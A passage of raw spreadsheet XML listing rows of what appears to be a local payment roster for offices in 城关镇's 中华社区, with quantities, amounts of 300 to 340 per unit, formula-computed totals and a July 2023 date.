      <c r="E880" s="14" t="s">
        <v>2357</v>
      </c>
      <c r="F880" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G880" s="14">
        <v>1</v>
      </c>
      <c r="H880" s="14">
        <v>340</v>
      </c>
      <c r="I880" s="14">
        <f t="shared" si="41"/>
        <v>340</v>
      </c>
      <c r="J880" s="24">
        <v>45108</v>
      </c>
      <c r="K880" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="881" ht="23" customHeight="1" spans="1:11">
      <c r="A881" s="13" t="s">
        <v>2358</v>
      </c>
      <c r="B881" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C881" s="14" t="s">
        <v>2359</v>
      </c>
      <c r="D881" s="14" t="s">
        <v>2360</v>
      </c>
      <c r="E881" s="14" t="s">
        <v>484</v>
      </c>
      <c r="F881" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G881" s="14">
        <v>2</v>
      </c>
      <c r="H881" s="14">
        <v>300</v>
      </c>
      <c r="I881" s="14">
        <f t="shared" si="41"/>
        <v>600</v>
      </c>
      <c r="J881" s="24">
        <v>45108</v>
      </c>
      <c r="K881" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="882" ht="23" customHeight="1" spans="1:11">
      <c r="A882" s="13" t="s">
        <v>2361</v>
      </c>
      <c r="B882" s="14" t="str">
        <f>B881</f>
        <v>城关镇</v>
      </c>
      <c r="C882" s="14" t="str">
        <f>C881</f>
        <v>中华社区就业办</v>
      </c>
      <c r="D882" s="13" t="s">
        <v>2362</v>
      </c>
      <c r="E882" s="13" t="s">
        <v>1768</v>
      </c>
      <c r="F882" s="14" t="str">
        <f>F881</f>
        <v>4113210108</v>
      </c>
      <c r="G882" s="14"/>
      <c r="H882" s="14"/>
      <c r="I882" s="14"/>
      <c r="J882" s="24"/>
      <c r="K882" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="883" ht="23" customHeight="1" spans="1:11">
      <c r="A883" s="13" t="s">
        <v>2363</v>
      </c>
      <c r="B883" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C883" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D883" s="14" t="s">
        <v>2365</v>
      </c>
      <c r="E883" s="14" t="s">
        <v>592</v>
      </c>
      <c r="F883" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G883" s="14">
        <v>1</v>
      </c>
      <c r="H883" s="14">
        <v>340</v>
      </c>
      <c r="I883" s="14">
        <f t="shared" ref="I883:I889" si="42">H883*G883</f>
        <v>340</v>
      </c>
      <c r="J883" s="24">
        <v>45108</v>
      </c>
      <c r="K883" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="884" ht="23" customHeight="1" spans="1:11">
      <c r="A884" s="13" t="s">
        <v>2366</v>
      </c>
      <c r="B884" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C884" s="14" t="s">
        <v>2367</v>
      </c>
      <c r="D884" s="14" t="s">
        <v>2368</v>
      </c>
      <c r="E884" s="14" t="s">
        <v>346</v>
      </c>
      <c r="F884" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G884" s="14">
        <v>1</v>
      </c>
      <c r="H884" s="14">
        <v>340</v>
      </c>
      <c r="I884" s="14">
        <f t="shared" si="42"/>
        <v>340</v>
      </c>
      <c r="J884" s="24">
        <v>45108</v>
      </c>
      <c r="K884" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="885" ht="23" customHeight="1" spans="1:11">
      <c r="A885" s="13" t="s">
        <v>2369</v>
      </c>
      <c r="B885" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C885" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D885" s="14" t="s">
        <v>2370</v>
      </c>
      <c r="E885" s="14" t="s">
        <v>2371</v>
      </c>
      <c r="F885" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G885" s="14">
        <v>1</v>
      </c>
      <c r="H885" s="14">
        <v>340</v>
      </c>
      <c r="I885" s="14">
        <f t="shared" si="42"/>
        <v>340</v>
      </c>
      <c r="J885" s="24">
        <v>45108</v>
      </c>
      <c r="K885" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="886" ht="23" customHeight="1" spans="1:11">
      <c r="A886" s="13" t="s">
        <v>2372</v>
      </c>
      <c r="B886" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C886" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D886" s="14" t="s">
        <v>2373</v>
      </c>
      <c r="E886" s="14" t="s">
        <v>592</v>
      </c>
      <c r="F886" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G886" s="14">
        <v>1</v>
      </c>
      <c r="H886" s="14">
        <v>340</v>
      </c>
      <c r="I886" s="14">
        <f t="shared" si="42"/>
        <v>340</v>
      </c>
      <c r="J886" s="24">
        <v>45108</v>
      </c>
      <c r="K886" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="887" ht="23" customHeight="1" spans="1:11">
      <c r="A887" s="13" t="s">
        <v>2374</v>
      </c>
      <c r="B887" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C887" s="14" t="s">
        <v>2355</v>
      </c>
      <c r="D887" s="14" t="s">
        <v>2375</v>
      </c>
      <c r="E887" s="14" t="s">
        <v>288</v>
      </c>
      <c r="F887" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G887" s="14">
        <v>1</v>
      </c>
      <c r="H887" s="14">
        <v>340</v>
      </c>
      <c r="I887" s="14">
        <f t="shared" si="42"/>
        <v>340</v>
      </c>
      <c r="J887" s="24">
        <v>45108</v>
      </c>
      <c r="K887" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="888" ht="23" customHeight="1" spans="1:11">
      <c r="A888" s="13" t="s">
        <v>2376</v>
      </c>
      <c r="B888" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C888" s="14" t="s">
        <v>2377</v>
      </c>
      <c r="D888" s="14" t="s">
        <v>2378</v>
      </c>
      <c r="E888" s="14" t="s">
        <v>346</v>
      </c>
      <c r="F888" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G888" s="14">
        <v>1</v>
      </c>
      <c r="H888" s="14">
        <v>340</v>
      </c>
      <c r="I888" s="14">
        <f t="shared" si="42"/>
        <v>340</v>
      </c>
      <c r="J888" s="24">
        <v>45108</v>
      </c>
      <c r="K888" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="889" ht="23" customHeight="1" spans="1:11">
      <c r="A889" s="13" t="s">
        <v>2379</v>
      </c>
      <c r="B889" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C889" s="14" t="s">
        <v>2377</v>
      </c>
      <c r="D889" s="14" t="s">
        <v>2380</v>
      </c>
      <c r="E889" s="14" t="s">
        <v>269</v>
      </c>
      <c r="F889" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G889" s="14">
        <v>2</v>
      </c>
      <c r="H889" s="14">
        <v>340</v>
      </c>
      <c r="I889" s="14">
        <f t="shared" si="42"/>
        <v>680</v>
      </c>
      <c r="J889" s="24">
        <v>45108</v>
      </c>
      <c r="K889" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="890" ht="23" customHeight="1" spans="1:11">
      <c r="A890" s="13" t="s">
        <v>2381</v>
      </c>
      <c r="B890" s="14" t="str">
        <f>B889</f>
        <v>城关镇</v>
      </c>
      <c r="C890" s="14" t="str">
        <f>C889</f>
        <v>中华社区民政局</v>
      </c>
      <c r="D890" s="19" t="s">
        <v>2382</v>
      </c>
      <c r="E890" s="20" t="s">
        <v>2383</v>
      </c>
      <c r="F890" s="14" t="str">
        <f>F889</f>
        <v>4113210108</v>
      </c>
      <c r="G890" s="14"/>
      <c r="H890" s="14"/>
      <c r="I890" s="14"/>
      <c r="J890" s="24"/>
      <c r="K890" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="891" ht="23" customHeight="1" spans="1:11">
      <c r="A891" s="13" t="s">
        <v>2384</v>
      </c>
      <c r="B891" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C891" s="14" t="s">
        <v>2385</v>
      </c>
      <c r="D891" s="14" t="s">
        <v>2386</v>
      </c>
      <c r="E891" s="14" t="s">
        <v>584</v>
      </c>
      <c r="F891" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G891" s="14">
        <v>1</v>
      </c>
      <c r="H891" s="14">
        <v>340</v>
      </c>
      <c r="I891" s="14">
        <f>H891*G891</f>
        <v>340</v>
      </c>
      <c r="J891" s="24">
        <v>45108</v>
      </c>
      <c r="K891" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="892" ht="23" customHeight="1" spans="1:11">
      <c r="A892" s="13" t="s">
        <v>2387</v>
      </c>
      <c r="B892" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C892" s="14" t="s">
        <v>2388</v>
      </c>
      <c r="D892" s="14" t="s">
        <v>2389</v>
      </c>
      <c r="E892" s="14" t="s">
        <v>689</v>
      </c>
      <c r="F892" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G892" s="14">
        <v>2</v>
      </c>
      <c r="H892" s="14">
        <v>330</v>
      </c>
      <c r="I892" s="14">
        <f>H892*G892</f>
        <v>660</v>
      </c>
      <c r="J892" s="24">
        <v>45108</v>
      </c>
      <c r="K892" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="893" ht="23" customHeight="1" spans="1:11">
      <c r="A893" s="13" t="s">
        <v>2390</v>
      </c>
      <c r="B893" s="14" t="str">
        <f>B892</f>
        <v>城关镇</v>
      </c>
      <c r="C893" s="14" t="str">
        <f>C892</f>
        <v>中华社区粮食局</v>
      </c>
      <c r="D893" s="22" t="s">
        <v>2391</v>
      </c>
      <c r="E893" s="22" t="s">
        <v>1300</v>
      </c>
      <c r="F893" s="14" t="str">
        <f>F892</f>
        <v>4113210108</v>
      </c>
      <c r="G893" s="14"/>
      <c r="H893" s="14"/>
      <c r="I893" s="14"/>
      <c r="J893" s="24"/>
      <c r="K893" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="894" ht="23" customHeight="1" spans="1:11">
      <c r="A894" s="13" t="s">
        <v>2392</v>
      </c>
      <c r="B894" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C894" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D894" s="14" t="s">
        <v>2393</v>
      </c>
      <c r="E894" s="14" t="s">
        <v>2394</v>
      </c>
      <c r="F894" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G894" s="14">
        <v>1</v>
      </c>
      <c r="H894" s="14">
        <v>340</v>
      </c>
      <c r="I894" s="14">
        <f t="shared" ref="I894:I900" si="43">H894*G894</f>
        <v>340</v>
      </c>
      <c r="J894" s="24">
        <v>45108</v>
      </c>
      <c r="K894" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="895" ht="23" customHeight="1" spans="1:11">
      <c r="A895" s="13" t="s">
        <v>2395</v>
      </c>
      <c r="B895" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C895" s="14" t="s">
        <v>2396</v>
      </c>
      <c r="D895" s="14" t="s">
        <v>2397</v>
      </c>
      <c r="E895" s="14" t="s">
        <v>2398</v>
      </c>
      <c r="F895" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G895" s="14">
        <v>1</v>
      </c>
      <c r="H895" s="14">
        <v>340</v>
      </c>
      <c r="I895" s="14">
        <f t="shared" si="43"/>
        <v>340</v>
      </c>
      <c r="J895" s="24">
        <v>45108</v>
      </c>
      <c r="K895" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="896" ht="23" customHeight="1" spans="1:11">
      <c r="A896" s="13" t="s">
        <v>2399</v>
      </c>
      <c r="B896" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C896" s="14" t="s">
        <v>2396</v>
      </c>
      <c r="D896" s="14" t="s">
        <v>2400</v>
      </c>
      <c r="E896" s="14" t="s">
        <v>592</v>
      </c>
      <c r="F896" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G896" s="14">
        <v>1</v>
      </c>
      <c r="H896" s="14">
        <v>340</v>
      </c>
      <c r="I896" s="14">
        <f t="shared" si="43"/>
        <v>340</v>
      </c>
      <c r="J896" s="24">
        <v>45108</v>
      </c>
      <c r="K896" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="897" ht="23" customHeight="1" spans="1:11">
      <c r="A897" s="13" t="s">
        <v>2401</v>
      </c>
      <c r="B897" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C897" s="14" t="s">
        <v>2385</v>
      </c>
      <c r="D897" s="14" t="s">
        <v>2402</v>
      </c>
      <c r="E897" s="14" t="s">
        <v>484</v>
      </c>
      <c r="F897" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G897" s="14">
        <v>1</v>
      </c>
      <c r="H897" s="14">
        <v>340</v>
      </c>
      <c r="I897" s="14">
        <f t="shared" si="43"/>
        <v>340</v>
      </c>
      <c r="J897" s="24">
        <v>45108</v>
      </c>
      <c r="K897" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="898" ht="23" customHeight="1" spans="1:11">
      <c r="A898" s="13" t="s">
        <v>2403</v>
      </c>
      <c r="B898" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C898" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D898" s="14" t="s">
        <v>2404</v>
      </c>
      <c r="E898" s="14" t="s">
        <v>269</v>
      </c>
      <c r="F898" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G898" s="14">
        <v>1</v>
      </c>
      <c r="H898" s="14">
        <v>340</v>
      </c>
      <c r="I898" s="14">
        <f t="shared" si="43"/>
        <v>340</v>
      </c>
      <c r="J898" s="24">
        <v>45108</v>
      </c>
      <c r="K898" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="899" ht="23" customHeight="1" spans="1:11">
      <c r="A899" s="13" t="s">
        <v>2405</v>
      </c>
      <c r="B899" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C899" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D899" s="14" t="s">
        <v>2406</v>
      </c>
      <c r="E899" s="14" t="s">
        <v>2407</v>
      </c>
      <c r="F899" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G899" s="14">
        <v>1</v>
      </c>
      <c r="H899" s="14">
        <v>340</v>
      </c>
      <c r="I899" s="14">
        <f t="shared" si="43"/>
        <v>340</v>
      </c>
      <c r="J899" s="24">
        <v>45108</v>
      </c>
      <c r="K899" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="900" ht="23" customHeight="1" spans="1:11">
      <c r="A900" s="13" t="s">
        <v>2408</v>
      </c>
      <c r="B900" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C900" s="14" t="s">
        <v>2355</v>
      </c>
      <c r="D900" s="14" t="s">
        <v>2409</v>
      </c>
      <c r="E900" s="14" t="s">
        <v>265</v>
      </c>
      <c r="F900" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G900" s="14">
        <v>2</v>
      </c>
      <c r="H900" s="14">
        <v>300</v>
      </c>
      <c r="I900" s="14">
        <f t="shared" si="43"/>
        <v>600</v>
      </c>
      <c r="J900" s="24">
        <v>45108</v>
      </c>
      <c r="K900" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="901" ht="23" customHeight="1" spans="1:11">
      <c r="A901" s="13" t="s">
        <v>2410</v>
      </c>
      <c r="B901" s="14" t="str">
        <f>B900</f>
        <v>城关镇</v>
      </c>
      <c r="C901" s="14" t="str">
        <f>C900</f>
        <v>中华社区物资局</v>
      </c>
      <c r="D901" s="13" t="s">
        <v>2411</v>
      </c>
      <c r="E901" s="13" t="s">
        <v>303</v>
      </c>
      <c r="F901" s="14" t="str">
        <f>F900</f>
        <v>4113210108</v>
      </c>
      <c r="G901" s="14"/>
      <c r="H901" s="14"/>
      <c r="I901" s="14"/>
      <c r="J901" s="24"/>
      <c r="K901" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="902" ht="23" customHeight="1" spans="1:11">
      <c r="A902" s="13" t="s">
        <v>2412</v>
      </c>
      <c r="B902" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C902" s="14" t="s">
        <v>2413</v>
      </c>
      <c r="D902" s="14" t="s">
        <v>2414</v>
      </c>
      <c r="E902" s="14" t="s">
        <v>779</v>
      </c>
      <c r="F902" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G902" s="14">
        <v>1</v>
      </c>
      <c r="H902" s="14">
        <v>340</v>
      </c>
      <c r="I902" s="14">
        <f>H902*G902</f>
        <v>340</v>
      </c>
      <c r="J902" s="24">
        <v>45108</v>
      </c>
      <c r="K902" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="903" ht="23" customHeight="1" spans="1:11">
      <c r="A903" s="13" t="s">
        <v>2415</v>
      </c>
      <c r="B903" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C903" s="14" t="s">
        <v>2413</v>
      </c>
      <c r="D903" s="14" t="s">
        <v>2416</v>
      </c>
      <c r="E903" s="14" t="s">
        <v>360</v>
      </c>
      <c r="F903" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G903" s="14">
        <v>1</v>
      </c>
      <c r="H903" s="14">
        <v>340</v>
      </c>
      <c r="I903" s="14">
        <f>H903*G903</f>
        <v>340</v>
      </c>
      <c r="J903" s="24">
        <v>45108</v>
      </c>
      <c r="K903" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="904" ht="23" customHeight="1" spans="1:11">
      <c r="A904" s="13" t="s">
        <v>2417</v>
      </c>
      <c r="B904" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C904" s="14" t="s">
        <v>2413</v>
      </c>
      <c r="D904" s="14" t="s">
        <v>2418</v>
      </c>
      <c r="E904" s="14" t="s">
        <v>709</v>
      </c>
      <c r="F904" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G904" s="14">
        <v>2</v>
      </c>
      <c r="H904" s="14">
        <v>300</v>
      </c>
      <c r="I904" s="14">
        <f>H904*G904</f>
        <v>600</v>
      </c>
      <c r="J904" s="24">
        <v>45108</v>
      </c>
      <c r="K904" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="905" ht="23" customHeight="1" spans="1:11">
      <c r="A905" s="13" t="s">
        <v>2419</v>
      </c>
      <c r="B905" s="14" t="str">
        <f>B904</f>
        <v>城关镇</v>
      </c>
      <c r="C905" s="14" t="str">
        <f>C904</f>
        <v>中华社区外贸局</v>
      </c>
      <c r="D905" s="13" t="s">
        <v>2420</v>
      </c>
      <c r="E905" s="13" t="s">
        <v>548</v>
      </c>
      <c r="F905" s="14" t="str">
        <f>F904</f>
        <v>4113210108</v>
      </c>
      <c r="G905" s="14"/>
      <c r="H905" s="14"/>
      <c r="I905" s="14"/>
      <c r="J905" s="24"/>
      <c r="K905" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="906" ht="23" customHeight="1" spans="1:11">
      <c r="A906" s="13" t="s">
        <v>2421</v>
      </c>
      <c r="B906" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C906" s="14" t="s">
        <v>2413</v>
      </c>
      <c r="D906" s="14" t="s">
        <v>2422</v>
      </c>
      <c r="E906" s="14" t="s">
        <v>265</v>
      </c>
      <c r="F906" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G906" s="14">
        <v>1</v>
      </c>
      <c r="H906" s="14">
        <v>340</v>
      </c>
      <c r="I906" s="14">
        <f>H906*G906</f>
        <v>340</v>
      </c>
      <c r="J906" s="24">
        <v>45108</v>
      </c>
      <c r="K906" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="907" ht="23" customHeight="1" spans="1:11">
      <c r="A907" s="13" t="s">
        <v>2423</v>
      </c>
      <c r="B907" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C907" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D907" s="14" t="s">
        <v>2424</v>
      </c>
      <c r="E907" s="14" t="s">
        <v>2425</v>
      </c>
      <c r="F907" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G907" s="14">
        <v>4</v>
      </c>
      <c r="H907" s="14">
        <v>260</v>
      </c>
      <c r="I907" s="14">
        <f>H907*G907</f>
        <v>1040</v>
      </c>
      <c r="J907" s="24">
        <v>45108</v>
      </c>
      <c r="K907" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="908" ht="23" customHeight="1" spans="1:11">
      <c r="A908" s="13" t="s">
        <v>2426</v>
      </c>
      <c r="B908" s="14" t="str">
        <f>B907</f>
        <v>城关镇</v>
      </c>
      <c r="C908" s="14" t="str">
        <f>C907</f>
        <v>中华社区工信局</v>
      </c>
      <c r="D908" s="18" t="s">
        <v>2427</v>
      </c>
      <c r="E908" s="18" t="s">
        <v>2428</v>
      </c>
      <c r="F908" s="14" t="str">
        <f>F907</f>
        <v>4113210108</v>
      </c>
      <c r="G908" s="14"/>
      <c r="H908" s="14"/>
      <c r="I908" s="14"/>
      <c r="J908" s="24"/>
      <c r="K908" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="909" ht="23" customHeight="1" spans="1:11">
      <c r="A909" s="13" t="s">
        <v>2429</v>
      </c>
      <c r="B909" s="14" t="str">
        <f>B908</f>
        <v>城关镇</v>
      </c>
      <c r="C909" s="14" t="str">
        <f>C908</f>
        <v>中华社区工信局</v>
      </c>
      <c r="D909" s="18" t="s">
        <v>2430</v>
      </c>
      <c r="E909" s="15" t="s">
        <v>2431</v>
      </c>
      <c r="F909" s="14" t="str">
        <f>F908</f>
        <v>4113210108</v>
      </c>
      <c r="G909" s="14"/>
      <c r="H909" s="14"/>
      <c r="I909" s="14"/>
      <c r="J909" s="24"/>
      <c r="K909" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="910" ht="23" customHeight="1" spans="1:11">
      <c r="A910" s="13" t="s">
        <v>2432</v>
      </c>
      <c r="B910" s="14" t="str">
        <f>B909</f>
        <v>城关镇</v>
      </c>
      <c r="C910" s="14" t="str">
        <f>C909</f>
        <v>中华社区工信局</v>
      </c>
      <c r="D910" s="18" t="s">
        <v>2433</v>
      </c>
      <c r="E910" s="15" t="s">
        <v>2434</v>
      </c>
      <c r="F910" s="14" t="str">
        <f>F909</f>
        <v>4113210108</v>
      </c>
      <c r="G910" s="14"/>
      <c r="H910" s="14"/>
      <c r="I910" s="14"/>
      <c r="J910" s="24"/>
      <c r="K910" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="911" ht="23" customHeight="1" spans="1:11">
      <c r="A911" s="13" t="s">
        <v>2435</v>
      </c>
      <c r="B911" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C911" s="14" t="s">
        <v>2388</v>
      </c>
      <c r="D911" s="14" t="s">
        <v>2436</v>
      </c>
      <c r="E911" s="14" t="s">
        <v>2124</v>
      </c>
      <c r="F911" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G911" s="14">
        <v>1</v>
      </c>
      <c r="H911" s="14">
        <v>340</v>
      </c>
      <c r="I911" s="14">
        <f>H911*G911</f>
        <v>340</v>
      </c>
      <c r="J911" s="24">
        <v>45108</v>
      </c>
      <c r="K911" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="912" ht="23" customHeight="1" spans="1:11">
      <c r="A912" s="13" t="s">
        <v>2437</v>
      </c>
      <c r="B912" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C912" s="14" t="s">
        <v>2355</v>
      </c>
      <c r="D912" s="14" t="s">
        <v>2438</v>
      </c>
      <c r="E912" s="14" t="s">
        <v>2439</v>
      </c>
      <c r="F912" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G912" s="14">
        <v>2</v>
      </c>
      <c r="H912" s="14">
        <v>300</v>
      </c>
      <c r="I912" s="14">
        <f>H912*G912</f>
        <v>600</v>
      </c>
      <c r="J912" s="24">
        <v>45108</v>
      </c>
      <c r="K912" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="913" ht="23" customHeight="1" spans="1:11">
      <c r="A913" s="13" t="s">
        <v>2440</v>
      </c>
      <c r="B913" s="14" t="str">
        <f>B912</f>
        <v>城关镇</v>
      </c>
      <c r="C913" s="14" t="str">
        <f>C912</f>
        <v>中华社区物资局</v>
      </c>
      <c r="D913" s="18" t="s">
        <v>2441</v>
      </c>
      <c r="E913" s="18" t="s">
        <v>2442</v>
      </c>
      <c r="F913" s="14" t="str">
        <f>F912</f>
        <v>4113210108</v>
      </c>
      <c r="G913" s="14"/>
      <c r="H913" s="14"/>
      <c r="I913" s="14"/>
      <c r="J913" s="24"/>
      <c r="K913" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="914" ht="23" customHeight="1" spans="1:11">
      <c r="A914" s="13" t="s">
        <v>2443</v>
      </c>
      <c r="B914" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C914" s="14" t="s">
        <v>2355</v>
      </c>
      <c r="D914" s="14" t="s">
        <v>2444</v>
      </c>
      <c r="E914" s="14" t="s">
        <v>621</v>
      </c>
      <c r="F914" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G914" s="14">
        <v>1</v>
      </c>
      <c r="H914" s="14">
        <v>340</v>
      </c>
      <c r="I914" s="14">
        <f t="shared" ref="I914:I923" si="44">H914*G914</f>
        <v>340</v>
      </c>
      <c r="J914" s="24">
        <v>45108</v>
      </c>
      <c r="K914" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="915" ht="23" customHeight="1" spans="1:11">
      <c r="A915" s="13" t="s">
        <v>2445</v>
      </c>
      <c r="B915" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C915" s="14" t="s">
        <v>2355</v>
      </c>
      <c r="D915" s="14" t="s">
        <v>2446</v>
      </c>
      <c r="E915" s="14" t="s">
        <v>527</v>
      </c>
      <c r="F915" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G915" s="14">
        <v>1</v>
      </c>
      <c r="H915" s="14">
        <v>340</v>
      </c>
      <c r="I915" s="14">
        <f t="shared" si="44"/>
        <v>340</v>
      </c>
      <c r="J915" s="24">
        <v>45108</v>
      </c>
      <c r="K915" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="916" ht="23" customHeight="1" spans="1:11">
      <c r="A916" s="13" t="s">
        <v>2447</v>
      </c>
      <c r="B916" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C916" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D916" s="14" t="s">
        <v>2448</v>
      </c>
      <c r="E916" s="14" t="s">
        <v>2302</v>
      </c>
      <c r="F916" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G916" s="14">
        <v>1</v>
      </c>
      <c r="H916" s="14">
        <v>340</v>
      </c>
      <c r="I916" s="14">
        <f t="shared" si="44"/>
        <v>340</v>
      </c>
      <c r="J916" s="24">
        <v>45108</v>
      </c>
      <c r="K916" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="917" ht="23" customHeight="1" spans="1:11">
      <c r="A917" s="13" t="s">
        <v>2449</v>
      </c>
      <c r="B917" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C917" s="14" t="s">
        <v>2396</v>
      </c>
      <c r="D917" s="14" t="s">
        <v>826</v>
      </c>
      <c r="E917" s="14" t="s">
        <v>232</v>
      </c>
      <c r="F917" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G917" s="14">
        <v>1</v>
      </c>
      <c r="H917" s="14">
        <v>340</v>
      </c>
      <c r="I917" s="14">
        <f t="shared" si="44"/>
        <v>340</v>
      </c>
      <c r="J917" s="24">
        <v>45108</v>
      </c>
      <c r="K917" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="918" ht="23" customHeight="1" spans="1:11">
      <c r="A918" s="13" t="s">
        <v>2450</v>
      </c>
      <c r="B918" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C918" s="14" t="s">
        <v>2451</v>
      </c>
      <c r="D918" s="14" t="s">
        <v>2452</v>
      </c>
      <c r="E918" s="14" t="s">
        <v>709</v>
      </c>
      <c r="F918" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G918" s="14">
        <v>1</v>
      </c>
      <c r="H918" s="14">
        <v>340</v>
      </c>
      <c r="I918" s="14">
        <f t="shared" si="44"/>
        <v>340</v>
      </c>
      <c r="J918" s="24">
        <v>45108</v>
      </c>
      <c r="K918" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="919" ht="23" customHeight="1" spans="1:11">
      <c r="A919" s="13" t="s">
        <v>2453</v>
      </c>
      <c r="B919" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C919" s="14" t="s">
        <v>2454</v>
      </c>
      <c r="D919" s="14" t="s">
        <v>2455</v>
      </c>
      <c r="E919" s="14" t="s">
        <v>2456</v>
      </c>
      <c r="F919" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G919" s="14">
        <v>1</v>
      </c>
      <c r="H919" s="14">
        <v>340</v>
      </c>
      <c r="I919" s="14">
        <f t="shared" si="44"/>
        <v>340</v>
      </c>
      <c r="J919" s="24">
        <v>45108</v>
      </c>
      <c r="K919" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="920" ht="23" customHeight="1" spans="1:11">
      <c r="A920" s="13" t="s">
        <v>2457</v>
      </c>
      <c r="B920" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C920" s="14" t="s">
        <v>2364</v>
      </c>
      <c r="D920" s="14" t="s">
        <v>2458</v>
      </c>
      <c r="E920" s="14" t="s">
        <v>284</v>
      </c>
      <c r="F920" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G920" s="14">
        <v>1</v>
      </c>
      <c r="H920" s="14">
        <v>340</v>
      </c>
